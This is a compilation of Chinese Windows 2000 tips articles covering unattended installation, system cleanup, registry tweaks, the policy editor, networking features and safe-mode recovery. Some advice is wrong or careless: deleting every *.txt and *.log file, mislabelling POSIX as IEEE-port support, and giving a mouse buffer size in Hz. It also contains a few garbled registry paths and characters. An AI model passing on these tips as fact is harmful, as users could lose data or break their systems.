管理员登录密码、显示设置、网络设置、加入工作组或域、时区、拨号代码、语言支持、浏览
器设置、系统文件夹名、网络打印机、安装完后的自动运行命令、用于一并安装设备驱动程序
的分发文件夹等信息，最后生成名为“Unattend.txt”的应答文件。

    用记事本打开已制成的应答文件，我们可以看到刚才填写的内容都以一定的书写格式记录
在此文件中。细心的朋友可能发现，制作应答文件时并没有要求用户输入产品序列号，我们需
修改应答文件来手工加入，否则安装过程中安装程序会提示用户输入序列号，从而不能实现完
全无人看守。加入产品序列号的方法为：在[UserData]项下加入“ProductID=‘*****-*****
-*****-*****-*****’”（不包括外层引号，这里的*应用实际序列号替代）。另外，我们可
再在[Unattended]项下加入“Repartition=Yes”（不包括引号，或=No）来设定是否在安装时
将原有分区全部删除后建一NTFS的新分区。在[Unattended]项下加入“FileSystem=ConvertN
TFS”（不包括引号，或=LeaveAlone）来设定是将安装分区格式化为NTFS文件系统，还是保持
不变。修改后的应答文件。

    最后说明一下应答文件的使用方法。

    用户若是从硬盘上进行安装，可先将光盘中的I386目录复制到硬盘上，再将应答文件放入
此目录中，并用/u:参数定位应答文件，/s:参数定位I386目录。如在DOS下可执行：Winnt /u
:unattend.txt /s:d:＼i386 /t:d:
用户若是从光盘上进行安装，可先在BIOS中设置为从光盘启动，并将应答文件改名为Winnt.s
if后放到1张空白软盘中。将软盘插入软驱，从光盘启动运行后，安装程序若发现有应答文件
，则会开始无人看守的全自动安装。若没有发现则以一般方式进行安装。

    Deploy.cab中的另外2个可执行文件Sysprep.exe和Setupcl.exe的功能有点类似于Ghost，
可用于复制出一台已成功安装配置的机器的信息，以便对其他相同配置的机器进行快速复制安
装，这里就不再赘述了。

六.valueADD目录
    此目录中有3RDPARTY和MSFT2个子目录，分别包含了由第三方和微软公司开发编写的程序
和组件。但这些程序组件并未完全通过与Windows 2000的兼容性测试。valueADD.html为其说
明文件。这里就不再详细介绍了，有兴趣的朋友可以自己试试。


Windows 2000实用技巧

《一键清理系统垃圾》

Windows 2000实用技巧

在进行以下操作之前，首先请你以“ADMINISTRATOR”的身份，即以系统管理员的身份，登录进入Windows 2000操作系统。

一、减少磁盘空间的浪费
在你的Windows 2000操作系统运行过程中，常常会产生诸如*.tmp、*.bak、*.log、*.old、*.txt的文件，这些文件其实都是可以安全删除的，甚至包括 WINNT 目录下面的*.bmp文件，如果你不喜欢Windows 2000中自带的那些墙纸的话。在删除这些文件以后，请记住清空回收站。
在你的Windows 2000操作系统WINNT\temp目录下面的文件，笔者也建议你删除掉，那些都是在安装应用软件的过程中遗留下的多余文件。还有一点，就是你硬盘中的小文件，请你尽可能地把它们集中起来，然后用WINZIP这样的压缩软件合并成一个大文件，从而达到减少磁盘空间浪费的目的。

二、当Windows 2000操作系统安全日志装满时
1.首先请你打开事件查看器。
2.在随后出现的控制台树中，请你用右键单击“安全日志”，然后单击“属性”。
3.然后请你在“常规”选项卡上，单击“改写久于 n 天的事件”或“不改写事件（手动清除日志）”。
4.接下来请你点击“开始——运行”，再键入 regedit.exe命令，按确定后进入“HKEY_LOCAL_ MACHINE\SYSTEM \CurrentControlSet\Control\Lsa”，这时请你用右键点击“CrashOnAuditFail”，创建“REG_DWORD” 类型，值为“1”即可。
5.此后，你需要重新启动你的计算机。
特别要提醒你的是：
1.怎样才能打开事件查看器？好办！请你单击“开始——设置”，然后请你单击“控制面板”。双击“管理工具”，然后再双击“事件查看器”即可。
2.在结束此过程之后，当安全日志装满时，Windows 2000 将停止响应并显示“审核失败”的消息。当 Windows 2000 停止时，若要进行恢复，必须清除安全日志。
3.如果 Windows 2000 由于安全日志已满而暂停，则必须重新启动系统，如果将来需要用装满的日志停机，则必须重复该过程。
4.错误地编辑注册表可能会严重损坏系统。更改注册表之前，至少应该备份计算机上任何有用的数据。
5.你必须作为管理员或管理组成员登录，只用这样才能完成该过程。

三、加快启动和故障恢复时间
你完全可以减少Windows 2000操作系统启动时显示操作系统列表的时间。如果你是一个忠实的Windows 2000操作系统的使用者，我建议你完成可以把启动等待时间设置为5秒。如果你不是网络系统管理员，那你完全可以去掉上面的“将事件写入系统日志”和“发出管理警报”这两个选项，并将“写入调试信息”设置为“无”。试试吧，很灵的！

四、自动关闭停止响应的程序
在Windows 2000操作系统中，这个设置可以使系统自动关闭停止响应的程序，而不需要你进行麻烦的手工干预。你想要实现这个功能，那就请你点击“开始——运行”，再键入regedit.exe命令，按确定后进入“HKEY_CURRENT_USERControl PanelDesktop” 中 AutoEndTasks的键值，将其设置为1即可。

五、移除 POSIX 支持
大家知道，POSIX（便携式计算机环境操作系统接口）界面被用来对IEEE接口进行支持，如果你没有任何设备使用IEEE接口，你可以将它移出你的系统。请将你电脑中winntsystem32 目录中的OS2.exe, OS2SS.exe, PSXSS.exe, POSIX.exe重命名为OS2.xxx, OS2SS.xxx, PSXSS.xxx, POSIX.xxx。这样即可移除 POSIX 支持。

六、帮你在Windows 2000 停止时恢复
1.首先请你重新启动计算机并用系统管理员组中的帐户登录。
2.打开“事件查看器”，存档目前记录的安全事件（如果需要），然后从安全日志中清除全部事件。
3.打开注册表编辑器，点击“开始——运行”，再键入 regedit命令，按确定进入找到注册表项：“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa”，右键点击“Lsa”，从弹出的菜单中创建“EG_DWORD”型,取值为 “1”，删除并替换CrashOnAuditFail 值。退出注册表编辑器。
4.重新启动计算机。
特别要提醒你的是：
1.你如果以前曾经用 CrashOnAuditFail=1 来配置你的系统注册表，并且你的安全日志已满，Windows 2000 将停止响应并显示“审核失败”的消息。如果发生这种情况，请使用上面的步骤。
2.请你要在备份过程中捕获注册表变化，确保运行备份程序时在备份集中包含系统状态数据的完好无损。

七、设置硬盘工作模式
现在电脑爱好者们所用的硬盘要比过去大得多，动辄10G、20G的。就本人所知：大硬盘一般都支持DMA工作模式，如果确定你的硬盘支持DMA方式，那么你就可以用DMA方式代替传统的PIO方式，这样可以提高硬盘的传输速度并减少你的CPU占用率，以提高你的系统性能。具体做法是： 请你用右键点击“我的电脑”——管理——设备管理器——IDE ATA/ATAPI控制器——Primary IDE Channel——属性——高级设置，在传输模式中请你选择“DMA”即可（在可用的情况下）。

八、鼠标的优化
告诉大家一个好消息：在Windows 2000中允许你对鼠标的采样速率进行设定，以使鼠标更精确地移动和定位。具体的做法是：请你点击开始菜单——控制面板——鼠标——硬件——属性，选择高级设置。将鼠标的采样速率设置为100Hz，输入缓冲区长度设置为300Hz，然后点击确定。如果在设置后系统变得不稳定，那就改变采样速率，设置成80Hz或以下即可。试试吧效果不错的。

九、菜单的加速显示
大家知道，Windows 2000的默认菜单显示是“淡出淡入”的效果，挺新颖的！但是在这种效果下，修改菜单的显示速度并不明显。那么该怎么样修改呢？请跟我来：
1.在你的桌面上单击右键——属性，此时将弹出“显示属性”窗口，然后在“效果”标签下将“动画显示菜单和工具提示”右边的“淡入淡出效果”改为“滚动效果”。
2.接下来点击“开始——运行”，再键入 regedit.exe命令，按确定后进入“HKEY_CURRENT_ USER\Control Panel\Desktop”,在右边窗口双击键值名“Menushowdelay”，这一项的取值范围是0~100000毫秒，接下来将默认值改为“0”或者是“400”即可。


Windows 2000实用技巧集锦

《一键清理系统垃圾》

Windows 2000实用技巧集锦

    一、妙用“我的图片”文件夹
    Windows 2000实现桌面墙纸功能很方便，不仅安装目录Winnt下的图像文件可以作墙纸，Winnt\Web\Wallpaper目录下的图像文件也会自动添加到“显示属性”对话框的“背景”选项卡中的背景图片列表中。Windows 2000还在“我的文档”中建立了一个“My Pictures”（我的图片）文件夹，如果想用你喜欢的图像作墙纸，只需把选择的图片放到“我的图片”文件夹中，在Windows 2000“显示属性”对话框中就可以直接选择“我的图片”文件夹中的图片作为桌面墙纸。
    二、将网上内容添加到桌面
    你可以从Internet 上获取图片，然后将其添加到桌面上，或者在桌面上添加“活动桌面库”中的项目，如股票行情板、滚动新闻、娱乐链接或天气预报信息等。你只需用鼠标右键单击桌面上的空白区域，指向“活动桌面”，单击“新桌面项目”，然后按屏幕上的提示操作即可完成上述工作。
    三、巧用桌面快捷方式
    在Windows 2000中，一种类型的文件仍然是只和一个程序建立关联。如果要用其他非关联的程序打开另一种类型的文件，一般的操作是按住Shift键，用右键单击文件，然后单击“打开方式…”命令，最后在“打开方式”对话框中选择打开这个文件的程序，这样的操作是很麻烦的。如果需要用来打开这类文件的非关联程序已经在桌面上建立了快捷方式，只需要将文件拖到应用程序的桌面快捷图标上，就可以用这个程序打开文件了。例如，要用Word 2000打开某个TXT文件，将这个TXT文件拖到桌面上的Word 2000图标上即可。你还可以在桌面上建立一个打印机的快捷图标，需要打印某个文件时，直接将文件拖到打印机图标上就可以完成打印操作。
    四、加密文件或文件夹
    利用Windows 2000 的加密工具，可以保护文件和文件夹，以防别人偷看。其方法是，在“Windows 资源管理器”中，用鼠标右键单击想要加密的文件或文件夹，然后单击“属性”。单击“常规”选项卡上的“高级”，然后选定“加密内容以保证数据安全”复选框。
    五、妙用浏览器
    如果要将某个网页添加到收藏夹，传统的操作是在打开网页后，使用“收藏／添加到收藏夹…”命令完成。能否把没有来得及打开的网页添加到收藏夹呢？在一个没来得及打开的链接上单击鼠标右键，选择快捷菜单的“添加到收藏夹…”命令，同样可以把这个网页添加到收藏夹，这样，下次浏览时可以直接从收藏夹中打开这个网页。如果把这个链接拖到桌面或者“我的文档”快捷图标上，以后就可以直接从桌面或者“我的文档”通过快捷方式访问这个链接。
    需要脱机浏览某个已经打开过的网页，传统的方式是按照在线打开的顺序一个链接一个链接地找到并打开这个网页。比较快的方式是将这个网页添加到收藏夹，以后在脱机方式下从收藏夹中浏览这个网页。其实，为这个网页建立一个快捷方式是最快的方法。在浏览器的地址栏中，已打开网页的网址前面都有一个小图标，用鼠标按住这个小图标，把它拖到桌面或者“我的文档”快捷图标上，下次就可以在桌面或者“我的文档”窗口中快速脱机浏览这个网页了。
    如果要查看某个链接的URL，用鼠标将这个链接拖到地址栏上，它的URL立即就显示在地址栏中了。
    六、妙用“运行”对话框
    如果已经确切地知道了某个软件下载的地址，又不想调用浏览器进行下载；或者你只想下载某个已知地址的网页、网页上的一幅图片或者一段视频信息，只要在“运行”对话框里输入正确的URL地址，按一下回车键就可以进行下载操作了。
    你用搜索的方式在硬盘或者网络上寻找一个文件或者一个所需信息的链接，查找对话框中的信息一般显示得不完全，用鼠标右键直接将文件或链接拖到“运行”对话框的窗口，文件、链接的路径、地址、文件全名就会马上显示出来。
    如果你正在其他文件夹里浏览时，突然想打开Windows 2000所在磁盘，只要在“运行”对话框中输入“\”、“／”或者“…”等字符，敲一下回车键就可以了。
    七、更改计算机名
    如果你的计算机有一个让人无法识别的名称（例如一串无关的字母和数字字符串），你或许想给它起个更直观或更个性化的名称。方法是打开“控制面板”中的“系统”，然后单击“网络标识”选项卡上的“属性”。在“计算机名称”字段中，键入计算机的新名称，然后单击“确定”。如果这台计算机是某个域的一个成员，它将提示你输入用户名和密码以重命名这台计算机。你必须以管理员身份登录这台本地计算机才能更改其名称。
    八、更改密码
    你可以更改让你的PC 连接到公司网络的密码。要更改密码，请同时按下Ctrl＋Alt＋Delete，然后单击“更改密码”。请记住新密码，以免劳驾网络管理员为你重新设置密码。
    九、硬盘错误检查与修复
    利用Windows 2000 的错误检查工具，可以查找到硬盘上的文件系统错误和坏扇区。方法是，打开“我的电脑”，选择需要检查的本地磁盘。在“文件”菜单上单击属性，然后单击“工具”选项卡。单击“错误检查”下的“开始检查”，并选定“磁盘检查选项”下的“扫描并尝试恢复坏扇区”复选框。
    十、判断Windows 2000是不是正式版的方法
    安装完Windows 2000后，若在桌面右下角出现build21xx此段文字，表示为微软在正式版前推出的测试版，如果你的系统为测试版，请赶紧用正式版重新安装，因为测试版有使用时间的限制。
    十一、诊断硬件问题
    如果某个外设有问题，可以用Windows 2000 中一个方便的实用程序来找到症结之所在。其方法是，打开“控制面板”上的“添加／删除设备”，单击“下一步”，单击“添加／修复设备”，然后单击“下一步”。在Windows 2000完成对新的即插即用设备的查找后，选择想要诊断和修复的设备，单击“下一步”，然后按照屏幕提示操作。


Windows 2000—网络更精彩

《一键清理系统垃圾》

Windows 2000—网络更精彩

    20世纪的最后十年是网络技术大放异彩的十年，在新千年推出的Windows 2000继承了上代产品Windows NT 4.0在网络方面的强劲功能，并结合了许多最新的网络技术，可以说是网络操作系统的集大成者。

    Windows 2000支持了许多TCP/IP协议的附加功能，增强了与UNIX系统的互联能力；对VPN技术的支持，使企业可以在Internet上搭建自己的虚拟专有网；内置的路由功能，使Windows 2000 Server可以作为一个拥有图形化界面的路由器；新加入的QoS服务，能为重要应用、实时声音和视频应用程序提供可靠的网络服务；功能丰富和强大的语音和媒体服务，使三网合一不再只是梦想。

    下面我就将Windows 2000这些激动人心的新功能一一道来。

    新增的TCP/IP功能TCP/IP协议作为一个通用的网络协议，它的核心功能的实现是相同的，但附加的功能各厂商则根据自己的情况加以取舍。微软在Windows 2000中引入了许多以前版本的Windows中没有提供的TCP/IP功能，使用户可以获得更好的网络性能。

    Windows 2000增强了TCP/IP包过滤的功能。管理员可以根据TCP端口、UDP端口、IP协议ID、ICMP类型、ICMP编码、源地址和目标地址进行包过滤，实现比如在POP服务器上限制只有本地局域网的计算机才能读取邮件这样的安全功能。

    Windows 2000中的TCP/IP组件支持RFCs 1122、1123、1323以及选择性确认(RFC 2018)等规范。遵循RFC 1122和1123规范可以保证与其它操作系统主机互联的兼容性；RFC 1323定义了在高带宽、高延迟的网络上(比如卫星线路)TCP的运行方式；选择性确认增大了TCP的窗口大小，并且当出现差错时，只重传窗口中丢失或错误的帧，而不是重传整个窗口，这就极大地提高了TCP的传输速度。

    Windows 2000扩展和提高了原来的IP管理方案。Windows 2000中的DNS服务支持SRV记录，以帮助客户找到网络中提供服务的DNS服务器。DNS服务也与活动目录集成在一起，DNS数据库可以作为活动目录数据库的一部分由活动目录在整个企业网络中复制，这就解除了为DNS服务另外设计一套复制机制的重复劳动。DHCP服务也实现了与DNS服务和活动目录的集成。当DHCP给计算机分配IP地址的时候，DNS和活动目录中的信息会同时动态更新。另外，通过活动目录授权的DHCP服务才能启动，避免了非法安装的DHCP服务给网络造成的混乱。

    低成本高安全的虚拟专用网(VPN)VPN一经推出，便迅速得以流行，这主要是缘于它在降低成本和提高通信安全性方面的优点。

    早期的企业要搭建自己的跨地区甚至跨国家的网络，只有自己搭建或者从网络运营商那里租借线路来实现，而这样不仅成本极其昂贵，而且安全性也得不到保证。伴随着Internet的迅猛发展，VPN技术应运而生。利用VPN技术，企业只需由ISP接入Internet，便可以与也接入Internet的另一端的分支机构安全地通讯。所付出的只是连接Internet的费用，而且信息在Internet上加密传输，安全性也得到了可靠的保证。

    各种VPN的实现中都使用了"隧道"技术来传输数据。如(上)下图中所示，数据在通过"隧道"传输前，被封装为公共网络中传输所使用的报文格式，然后进行传输，到达"隧道"终点后，再除去添加的封装信息，还原为原来的报文格式。

    Windows 2000中提供3种技术来创建VPN：

    Point-to-Point Tunneling Protocol (PPTP)--这是在NT 4.0中使用的VPN技术，建立在PPP协议基础上，具有验证和握手功能，缺点是只能应用在拨号连接线路上。

    Layer 2 Tunneling Protocol(L2TP)--L2TP被认为是PPTP的增强版。相比PPTP的一个主要优点是支持MPPP(Multilink Point-to-Point Protocol)，并且可以在许多Internet连接线路上运行，如帧中继、X.25和ATM，支持帧头压缩可以比PPTP消耗更少的带宽。

    IP Security(IPSec)--IPSec是下一代的隧道协议，相比PPTP和L2TP其最大优势在于标准化，所有网络厂商都纷纷声明对该技术的支持。IPSec通过通信双方身份验证和数据加密，使信息能更安全地在公共网络上传输。

    Windows 2000中VPN实现起来也很简单。"网络连接向导"提供了一个统一的界面来设置拨号连接、VPN和直接电缆连接等网络连接。在这个界面里，首先建立一个连接Internet的拨号连接，然后建立一个VPN连接，VPN就设置成功了。要连接远程网络，只需先通过普通的PPP服务连接上Internet，然后通过虚拟的VPN调制解调器再拨一个号，这个号就是远程VPN服务器的IP地址或主机名。接下来进行登录验证后，就和远程VPN服务器在Internet上建立了一个虚拟的隧道，远程网络在感觉上就成为了一个本地局域网。服务器端的设置通过路由和远程访问服务的MMC界面来实现，其设置工作也非常简单（见下图）。

    强大的路由能力从NT 3.51开始，微软就将路由功能集成到了操作系统中，使基于NT Server的计算机可以执行一些简单的路由工作，但这个服务实际上几乎没有在实际中得到应用。在Windows 2000中集成的路由和远程访问服务大大增强了这方面的功能，使一些小公司不用购买昂贵的路由器就可以实现网络的分段，并且管理是图形化的方式，而不是令人望而生畏的字符模式。

    静态路由对于一些小型网络和路由变化很小的网络来说，比动态路由具有更大的优势。在NT 4.0中设置静态路由是在命令行方式下使用Route命令来输入，在Windows 2000中可以在路由和远程访问服务的MMC管理界面下进行设置。这样静态路由的设置就更为方便了。

    大型网络中，网络的变化是经常发生的，由系统管理员设置静态路由的方式很难及时反应网络的变化，这时使用动态路由协议几乎是唯一的选择。Windows 2000不仅继续支持NT 4.0就支持的RIP协议，也支持更有扩展性的OSPF协议。

    RIP协议从1982年开始使用到现在仍然是一个广泛使用的路由协议。RIP协议属于距离矢量路由协议，它的第一个版本RIP v1具有许多缺点，比如不支持无类子网划分、定期向其它路由器广播自己的路由表、没有安全验证等，被网络工程师戏称?quot;唧唧喳喳"的路由协议。第二个版本的RIP v2则克服了上述缺点，但由于距离矢量路由协议的固有缺点(路由汇聚慢、无谓的网络带宽消耗和路由选择不佳等)，限制了该协议在大型网络中的使用。不过RIP协议配置起来比较简便，使得在中小网络中它还是得到了非常广泛的使用。作为链路状态路由协议的OSPF协议非常适合作为中型和大型网络的路由协议。OSPF协议在网络状态发生变化时能够很快将变化了的路由信息通知网络中的路由器，快速地实现路由汇聚。OSPF协议选择最佳路由的依据比RIP协议更细致，所以可以更好地进行路由选择。但OSPF协议规划和配置起来就比RIP协议复杂了许多。

    Windows 2000对上述两种路由协议的支持，使得Windows 2000具有很大的伸缩性，可以满足不同规模企业的要求。

    一些象网络会议、远程教学的应用，一台主机需要发送同样的内容给多台主机，采用单点发送的方式会造成这些重复数据在网络上被多次发送，浪费了带宽，而使用广播方式会造成网络性能的显著降低，而且广播是无法通过路由器转发到其它网段的，这时可以使用多点发送的方式来进行通信。

    Windows 2000通过支持TCP/IP协议栈中的IGMP v2协议来提供这种服务。IGMP协议使用IP地址规范中的D类地址(首位为224~239)作为多点广播地址，从中分配一个IP地址给参与网络会议的各计算机，发送数据时以该地址作为目标地址，则数据只需发送一次就可以到达多台主机。Windows 2000 Server内置了一个IGMP的路由器和代理，通过这两个服务连接到Internet的MBONE(Multicast Backbone)区域，就可以为内部Intranet提供接受和发送IGMP报文的功能。

    IGMP路由器和代理的设置可以通过设置路由和远程访问服务中IGMP的属性来完成（见下图）。

    服务质量的承诺(QoS)为了在网络上传输需要保证服务质量和优先级的信息，Windows 2000还提供了QoS(Quality of Service)的管理功能。QoS的彻底实现需要网络的全面支持，不仅操作系统和应用程序要支持QoS，网络中的路由器和交换机也必须支持QoS，如果要在Internet上实施QoS，那么通信中涉及的所有ISP都应当支持QoS。尽管这在实际上比较难以做到，但用户仍会从Windows 2000对QoS的支持中受益。

    QoS要解决的主要是通信中的两个问题：延迟和抖动。

    延迟主要来自路由器转发报文的延迟，单个或者几个路由器延迟还不太明显，当报文要穿越许多路由器时，各路由器延迟的累加就不能忽略了。延迟对于象视频点播这样的单向信息传送的应用并不是问题(每个报文都以相同的延迟到达目的地)，但对于网络会议这样信息需要双向传送的应用来说就不可容忍了(想象一下与会者说一句话后，要等上几分钟才能听到对方回答这样的情形)。

    抖动则是由于报文在分组交换网络中传递时，可能每个报文沿着不同的路由路径到达目的地，使得每个报文的延迟各不相同。在IP电话这样的应用中，就会出现话音忽快忽慢的情况。

    Windows 2000内置或者在Resource Kit中提供了相应管理工具、服务和APIs来支持带宽预留、流量控制和服务优先级等QoS标准。

    RSVP(Resource Reservation Setup Protocol)使用了类似于电话网络的技术来减少抖动和为应用预留带宽。在RSVP通信方式下，客户机向服务器首先发送一个PATH消息。那些转发PATH消息的设备将自己加入到PATH消息的路径列表中，并为这个连接分配相应的带宽资源，最后到达服务器。之后服务器向客户机发送一个RESV消息，该消息沿PATH消息传送的路径返回客户机，这时路径中的所有转发设备都要确认自己是否已经为该连接分配了带宽。通信正式开始后，客户机还会定期发送PATH消息，让转发设备继续保留这次连接所分配的带宽，直到通信结束靡桓鎏厥獾腜ATH消息通知转发设备释放所保留的带宽。该过程如下图所示。RSVP为通信双方确保了一定的网络带宽，而且保证报文始终沿着一条固定的路径传送，也就避免了抖动问题。

    流量控制是操作系统控制哪个进程可以得到更快的处理，相应地使用更多的网络带宽。

    对于一些关键事务来说，发送可能是间歇性的，采用预留带宽的方式没有太大意义。这时可以使用服务优先级(Diff-Serve)的方式，在某服务对应的IP报文头中的"服务类型"(Type Of Service)段填入优先级。转发设备根据这个数值将更高优先级服务的报文优先发送，保证关键的业务得到及时地处理。也可以在数据链路层实现优先级定义，在帧中加入标签对不同优先级别的数据加以标识，IEEE 802.1p描述了这项技术。

    上面提到的这些QoS技术在应用中如果不加控制，QoS不仅起不到保证服务质量的作用，反而会带来负面作用。如果大家都为自己的任务申请最高的优先级、要求保留足够的带宽，结果是与没有实施QoS一样，甚至由于QoS加入了一些控制信息，使网络性能更加恶化。QoS许可控制服务(QoS Admission Control Service)就是为了避免QoS被滥用而引入的。QoS许可控制服务使用策略的方式决定哪种资源请求可以批准、哪种请求应被拒绝。策略基于网络拓扑、可用资源、用户、组和应用程序定义，保存在活动目录中，能通过活动目录的机制在整个企业网络范围内生效。

    统一网络目前实际中有三种网络共存：数据网络、语音网络和有线电视网络，不能不说在资源上颇为浪费，最好能有一种网络既可以传输计算机的数据，又可以提供语音和视频服务。因此，要求三网合一的呼声越来越强烈。

    但是，三网合一并不是简单地将三种网络适当改造，然后用适当的接口将它们连接起来就可以了。每种网络是针对对应的应用而设计的，不可能很好地完成其它应用的要求，比如语音网络不能有效地传输计算机数据，更不适合传输宽带视频信号，计算机网络也不能保证语音和视频信号的实时性和服务要求。未来的网络应当是在同一个网络平台下，运行同一个协议族，为语音、数据和视频信号的传输提供可靠的服务。这要求该网络既具有底层传输技术的多样性，又具有高层应用的多样性。目前看来，只有计算机网络可能胜任该项工作。

    现有的计算机网络首先必须在底层加以改造，解决网络带宽问题，才有可能负担语音和视频信号的传输，在上层也必须设计相应的应用和服务来提供语音和视频功能。Windows 2000作为新一代网络操作系统，内置了许多支持三网合一的特性。

    在Windows 2000中集成了微软公司著名的语音服务产品NetMeeting 3.0。NetMeeting能在两个IP主机之间建立语音、视频或者数字会议，并且与活动目录通过ILS(Internet Locator Service)集成在一起。呼叫方可以输入被叫方的网络登录名，从活动目录查找到对方现在所在主机的IP地址，建立起呼叫，然后双方开始网络会议，可以交换文件、讨论或者共享应用程序，甚至共享桌面。

    Windows 2000中还提供了一套开发数字语音应用程序的接口函数库TAPI 3.0。TAPI 3.0能支持传统的PSTN电话和IP电话两种电话，为开发人员提供了一个良好的开发环境，它将呼叫控制的功能抽象出来，在开发时开发人员无需考虑将要连接到何种网络上。在TAPI 3.0中集成了传统电话的媒体流控制功能，采用COM组件模式，允许以C、C++和VB等多种编程语言来编写TAPI应用程序。除了支持传统电话的功能以外，TAPI 3.0还支持标准的H.323会议和IP广播会议，并提供QoS控制功能。

    Windows Media(媒体服务)是Windows 2000提供的又一优秀产品，包括前台的播放器(Media Player)、后台的服务器(Windows Media Service)等组件，能广泛应用在娱乐、培训和远程教育方面。

    网络在飞速发展，Windows 2000将这些优秀的网络技术兼收并蓄，同Windows NT 4.0相比，它不再仅仅是一个文件和应用程序服务器操作系统，而是一个强大、坚固、易管理和更安全的网络操作系统，将很大地提高个人的工作效率和企业的生产效率。

返回


Windows 2000系统策略编辑器

《一键清理系统垃圾》

Windows 2000系统策略编辑器

    Windows 2000提供的系统策略编辑器（poledit，以下简称策编器）可以对用户组或者所有用户设置各种策略。当这些策略被设定后，系统就会自动修改注册表中的相关内容，并且当相应的用户登录系统后，系统就会自动修改注册表中的信息。即使用户不断地手工修改注册表，系统也会自动根据已经制定的策略修复注册表的信息。
    一、系统策略编辑器的安装
    策编器一般需要另行安装。在Windows 2000安装光盘的\tools\reskit\netadmin\poledit子目录中可以找到它。在Windows 2000安装完成后的系统目录中还有一个admin.adm的文件，拥有这两个文件后就可以使用策编器了。
    在Windows 2000中首次运行poledit时，先将poledit.exe和admin.adm拷贝到Windows目录下，然后在Windows的“运行”对话框中执行poledit.exe，系统提示你打开一个模板文件。在C:\Windows目录中选择admin.adm文件，然后单击“打开”按钮，则进入策编器的主界面。
    二、用系统策略编辑器保护Windows 2000
    启动poledit之后，单击窗口中的“文件”菜单下的“打开注册表”命令，即可使“本地用户”和“本地计算机”两个图标出现在窗口中。
    1．对“本地用户”的控制
    单击“本地用户”图标便可打开“本地用户属性”对话框，在“本地用户”下有“控制面板”、“桌面”、“网络”、“外壳”、“系统”等项目。单击项目旁的“＋ ”符号即可将项目下可以控制的内容逐层显示出来。根据你选择的具体内容，有以下三种情况：
    （1）选中生效的，如“系统→限制”项目下的“禁止注册表编辑工具”项。
    （2）需要进行设置的，如“系统→限制”项目下的“只能运行的Windows应用程序”项，你需要输入允许运行的应用程序名称。
    （3）需要逐项设置的，如：“控制面板→口令→限制口令控制面板”项下还有四个子项（显示在“本地用户属性”对话框的下方），你可以对子项中的内容进行逐项设置。
    若要禁止或限制他人使用某些项目，只要按以上介绍进行设置，结束后单击对话框中的“确定”按钮回到策编器窗口，然后单击“文件”菜单下的“保存”命令，不用重新启动即可使设置生效。
    假若你选中了“系统→限制”项下的“禁止注册表编辑工具”，按上面的方法保存后，如果运行Regedit命令，则系统就会弹出警告框：“注册表编辑器已被管理员禁止”。
    2．对“本地计算机”的控制
    单击策编器窗口中的“本地计算机”图标，即可打开“本地计算机属性”对话框。在“本地区计算机”下有“网络”和“系统”两个项目。按上面介绍的方法可实现对某些项目的禁止或限制使用。
    为保险起见，在修改结束后可将文件poledit.exe拷贝到软盘上保存，再将原文件删除，这样一般人就不能随便修改你的系统了。
    三、系统策略编辑器的几个应用
    1．防止桌面被他人改动
    每个人的Windows 2000的桌面，显示设置等都不喜欢被他人改动。实现这一功能的最简单的方法就是把“显示”属性框隐藏起来，如果用注册表编辑器来实现就有些麻烦，但是用poedit只需轻点几下鼠标就可以了：
    （1）打开策编器，选取“文件”菜单下的“打开注册表”选项，就出现了一个窗口。
    （2）单击窗口中的本地用户图标，然后选取“控制面板→显示器→限制→显示器控制面板”选项。
    （3）从“策编器”窗口下方的四个复选取框中选取自己想进行限制的项目。然后保存策略选项后，系统将出现相应的变化。
    2．防止对系统驱动程序的误删
    一台计算机的用户可能不止一个，如果你是系统的主人的话，自然不想让他人去动IRQ设置、驱动程序等有关系统性能正常工作的东西，而这些设置存在于系统属性对话框中，因此只要把重要的设置隐藏起来就可以了。具体操作如下：
    （1）打开策编器，选取“文件”菜单中的“打开注册表”选项出现窗口。
    （2）单击本地用户图标，选取“控制面板”系统限制系统控制面板选取项。
    （3）从系统略编辑器窗口下方的几个选项中选取自己想进行限制的项目。
    （4）保存以上策略。
    3．对注册表的禁止
    poledit的操作在注册表中都可以恢复并且对于有经验的人员来说可以通过DOS来进行改变。如果要把系统的生杀大权彻底地掌握在手中，就要终止注册表编辑器和控制访问DOS的权限。具体操作如下：
    （1）打开策编器。
    （2）在弹出对话框中单击“本地用户”，然后选取“系统→限制→禁用注册表编辑器”复选框。
    （3）也可以限制其他项目，如：禁用MS－DOS方式等。
    （4）保存系统策略。


Windows 2000系统的诊断与恢复

《一键清理系统垃圾》

Windows 2000系统的诊断与恢复

    Windows 2000系统还是有可能出现故障，遇到故障，你还可以采取下述手段。
    1．诊断模式的使用
    Windows 95／98在系统出现故障时可以采用安全模式进行诊断和调整，Windows 2000保留了这个功能。用户在遇到Windows 2000异常时，可以使用诊断菜单试着解决问题，在Windows 2000启动时，按F8键，即可进入诊断选择菜单，共有八个选项，分述如下：
    ①安全模式：只使用基本文件和驱动程序启动Windows 2000，不能联网。这种模式用于解决启动系统时可能出现的问题。需要注意的是某些设备在安全模式下可能无法使用。安全模式选项常用于解决硬件设置冲突导致的故障，比如显卡驱动故障、中断冲突造成的设备不能正常工作等。
    ②带网络连接的安全模式：此选项在安全模式的基础上再加载网络驱动程序，这个模式允许用户访问网络资源，但不支持PCMCIA联网。
    ③带命令行提示的安全模式：该选项加载驱动与安全模式相同，但进入的不是图形界面，而采用DOS命令行的操作方式。
    ④启用启动日志：利用启动日志启动计算机。
    ⑤启用VGA模式：用基本VGA驱动程序启动，常用于显卡驱动问题造成的启动异常。
    ⑥最后一次正确的配置：这种方式利用最近一次正常关机所保存的计算机配置信息来启动计算机。
    ⑦目录服务恢复模式：恢复域控制器上的活动目录，专业版不可使用此功能。
    ⑧调试模式：与安全模式相似，用于系统优化。
    如果调用了诊断菜单仍想回到正常启动方式，按ESC键即可。
    2．系统的恢复
    系统的恢复常用于安全模式也不能正常运行的情况下，有两种方法，一是用紧急修复磁盘，二是用系统恢复功能。
    紧急修复磁盘的制作：点击“开始／程序／附件／系统工具／备份”菜单调用系统备份工具，在工具的欢迎选项卡中有“紧急修复盘”按钮，点击它，按系统提示将一片格式化好的软盘放入软驱，再点击“开始”，系统开始制作，完成后点击“确定”，请妥善保管紧急修复盘。
    紧急修复磁盘的使用：盘内共有三个文件：Autoexec.nt、Config.nt、Setup.log，它们的具体用法请参阅联机帮助文件。
    系统恢复功能，其实就是对系统和用户数据的备份与还原，用户应养成良好的备份习惯，在系统出现问题时利用备份工具就有可能将损失减小到最低限度，其用法与Windows 95／98下的备份工具相同。

作者：
来源：电脑报


Windows 2000系统文件夹一览

《一键清理系统垃圾》

